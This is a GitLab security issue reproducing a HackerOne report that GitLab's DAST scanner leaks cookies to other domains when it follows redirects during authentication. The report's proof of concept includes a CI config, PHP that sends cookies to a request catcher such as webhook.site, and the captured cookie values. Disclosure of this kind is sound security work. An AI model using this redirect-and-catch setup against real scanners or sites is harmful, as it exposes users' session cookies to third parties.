DAST scanner leak cross site cookies on redirect during authorization
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1889255 by joaxcar on 2023-02-28, assigned to @truegreg:
Report
Summary
First of I want to note to any triager that this bug looks a lot like a bunch of other reports by me made 2-4 months ago. These reports are not resolved but there have been patches put out for all of them. This one is distinct from the previous ones and can be seen as a bypass or a fix miss.
When running GitLabs DAST scanner there is the option to first have the runner authenticate to acquire tokens or cookies. This connection is made independently from the actual scan. Previously any redirect on this auth page would leak access tokens and special headers, this is now fixed. But the scanner still send cross site cookies to other origins if it encounters a redirect.
Say that the auth page is located at https://example.com and this page sets a cookie for its own domain. It the page later in the code encounters a redirect (301,302,307,308) for example in a form request or in a CSS link tag, this redirect to other domain, for example http://notexample.org, will contain the cookies for http://example.com
This will not happen if visiting the same auth site outside of using the DAST scanner (and should never happen)
Steps to reproduce
- Create a new project called "dast-test"
- Go to https://gitlab.com/GROUPNAME/dast-test/-/ci/editor
- Enter this config
stages:
- dast
include:
- template: DAST.gitlab-ci.yml
variables:
DAST_WEBSITE: https://joaxcar.com/scan3.php?url=https://catchserver.com
DAST_AUTH_URL: "https://joaxcar.com/scan3.php?url=https://catchserver.com"
DAST_USERNAME: “john”
DAST_PASSWORD: “P@ssw0rd”
DAST_USERNAME_FIELD: "username"
DAST_PASSWORD_FIELD: "password"
DAST_SUBMIT_FIELD: "submit"
dast:
stage: dast where you replace https://catchserver.com with any form of request catcher. Either https://webhook.site or burp collaborator
4. Click save and the pipeline will run
My page https://joaxcar.com/scan3.php contains this PHP
<?php
setcookie("auth-session", "123-test-user", time()+3600, "/", "joaxcar.com", 1, 1);
$lifetime=600;
session_set_cookie_params($lifetime);
session_start();
echo "<html><head>";
echo "<meta name=\"gitlab-dast-validation\" content=\"";
echo $_GET["validation"];
echo "\">";
echo "<link rel=\"stylesheet\" href=\"https://joaxcar.com/redirects/no_cors.php?url=";
echo $_GET["url"];
echo "\" />";
echo "</head><body><form action=\"https://joaxcar.com/redirects/no_cors.php?url=";
echo $_GET["url"];
echo "\" method=\"POST\">";
echo "<input name=username type=text id=username>
<input name=password type=password id=password>
<button type=submit name=submit id=submit></button>
</form>
</body>
</html>";
?> It is not an attempt of writing any form of great PHP, I know noting of it. But you can see in the beginning that I generate a PHP session cookie for joaxcar.com and that there is a link rel and a POST form both sending requests to https://joaxcar.com/redirects/no_cors.php which just generates a redirect to the catch server.
- Go to the catch server and wait for the pipeline to finish
- You will see one request coming in containing the cookie (the link tag)
auth-session=123-test-user; PHPSESSID=2a8db8c08af6d256230640911cfdb499 This is cookies meant for joaxcar.com
The form will also leak cookies if the server responds with a 307 or 308 redirect. The PHP redirect on my site will only throw an 302. Test this if you want to see it using .htaccess .
Impact
DAST scanner leaking potentially harmful cookies cross site.
What is the current bug behavior?
DAST scanner forwards cookies to other domains on redirect
What is the expected correct behavior?
Redirect following the normal rules for cookies
Output of checks
This bug happens on GitLab.com
Impact
DAST scanner leaking potentially harmful cookies cross site.
How To Reproduce
Please add reproducibility information to this section: